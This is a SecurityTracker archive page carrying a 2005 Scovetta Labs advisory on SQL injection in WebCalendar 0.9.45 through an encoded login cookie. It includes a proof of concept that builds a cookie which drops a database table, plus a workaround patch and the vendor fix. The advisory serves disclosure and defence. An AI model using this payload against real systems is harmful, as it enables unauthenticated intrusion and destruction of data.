SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Calendar)  >   WebCalendar Vendors:   Knudsen, Craig
WebCalendar user_valid_crypt function() Input Validation Error Lets Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1013231
SecurityTracker URL:  http://securitytracker.com/id/1013231
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 18 2005
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 0.9.45
Description:   A vulnerability was reported in WebCalendar. A remote user can inject SQL commands.

The user_valid_crypt function() does not properly validate the user-supplied login name parameter contained in encoded form in a cookie. The value is decoded and is used in composing an SQL query to determine if the user is authenticated. A remote user can submit a specially crafted, encoded cookie to execute SQL commands on the underlying database.

The vendor was notified on February 1, 2005.

Michael Scovetta of Scovetta Labs discovered this vulnerability.

The original advisory is available at:

http://www.scovettalabs.com/advisory/SCL-2005.001.txt

Impact:   A remote user can execute arbitrary SQL commands on the underlying database.
Solution:   The vendor has released a fixed version (0.9.5), available at:

http://www.k5n.us/downloads.php

Vendor URL:  www.k5n.us/webcalendar.php (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [ SCL-2005.001 ] - WebCalendar: SQL Injection from encoded cookie


=====[BEGIN-SCL-REPORT]=====

________________________________________________________________________

                    Scovetta Labs Security Advisory

  Title:         WebCalendar: SQL Injection from encoded cookie
  Status:        Public
  Release Date:  2005-02-16
________________________________________________________________________

  Package:       WebCalendar
  Vendor:        k5n.us - http://www.k5n.us/webcalendar.php
  Priority:      High
  Vulnerability: SQL Injection


Affected Versions:
==================

  0.9.45 is vulnerable.
  Previous versions have not been tested.


Background: (official description)
===========

  WebCalendar is a PHP-based calendar application that can be configured
  as a single-user calendar, a multi-user calendar for groups of users,
  or as an event calendar viewable by visitors. MySQL, PostgreSQL,
  Oracle, DB2, Interbase, MS SQL Server, or ODBC is required.
  WebCalendar can be downloaded from [1].


Description:
============

  WebCalendar is vulnerable to SQL Injection attacks launched through
  an encoded cookie that is inserted into a request. Using a locally
  installed version, and an MSSQL back-end database (ODBC), we were
  able to drop an arbitrary table from the database by launching an
  attack as a non-authenticated user.


Analysis:
=========

  The user_valid_crypt function (includes/user.php) fails to validate
  that the login name consists of legal characters. This function is
  called from a validation routine (includes/validate.php), with
  data derived from the cookie. The cookie is encoded (not encrypted)
  and consists of data in the following format:

	[login]|[salt][crypt(password, salt)]

  When the cookie is decoded, the login is placed into a SQL query and
  executed. Based on the data returned, the user is either authenticated
  or otherwise the cookie is cleared and the user is directed to login
  again.

  The vulnerability is exacerbated when the underlying database allows
  for multiple SQL queries to be executed together, as in:

	select 1; select 2; select 3;


Exploit:
========

  <?php
    include_once 'includes/init.php';
    echo encode_string("'; drop table foo; select 'a|zzabcdefg");
  ?>

  output:
    7c8c3a738e858f4199b6b386743c7c8e906075c47f7b817993414cb6cd \
    94897d7882858abbb8

  attack payload:

    telnet servername
    GET /login.php HTTP/1.1
    Cookie: webcalendar_session=7c8c3a738e858f4199b6b386743c7c \
            8e906075c47f7b817993414cb6cd94897d7882858abbb8


Work-around:
============

  You can mitigate this by using the following diff patch:

39a40
 >           $login = addslashes($login);

  The vendor has released version 0.9.5 which includes a fix for
  this issue. All users are encouraged to upgrade to the latest
  version of WebCalendar.


Vendor Response:
================

  2005-01-31 - Vulnerability discovered.
  2005-02-01 - Vendor contacted.
  2005-02-01 - Response received from vendor.
  2005-02-09 - Version 1.0RC2 released on vendor site[2].
  2005-02-16 - Advisory released.


Revision History
================

2005-02-01: Initial Draft
2005-02-14: Public Release [0]


Credits:
========

  Michael Scovetta of Scovetta Labs discovered this vulnerability.


References:
==========

  [0] http://www.scovettalabs.com/advisory/SCL-2005.001.txt
  [1] http://www.k5n.us/webcalendar.php
  [2] http://www.k5n.us/files/WebCalendar-1.0RC2.zip


Disclaimer
==========

  The content of this report is purely informational and meant only
  for the purpose of education and protection. Scovetta Labs and
  Michael Scovetta shall in no event be liable for any damage
  whatsoever, direct or implied, arising from use or spread of this
  information. All identifiers (hostnames, IP addresses, company names,
  individual names etc.) used in examples and demonstrations are used
  only for explanatory purposes and have no connection with any real
  host, company or individual. In no event should it be assumed that
  use of these names means specific hosts, companies or individuals
  are vulnerable to any attacks nor does it mean that they consent to
  being used in any vulnerability tests. The use of information in
  this report is entirely at user's risk.


Copyright
=========

  (c) 2005 Michael Scovetta. Forwarding and publishing of this document
  is permitted providing the content between "[BEGIN-SCL-REPORT]" and
  "[END-SCL-REPORT]" marks remains unchanged.


=====[END-SCL-REPORT]=====


-- 
Michael SCovetta
Scovetta Labs
www.scovettalabs.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC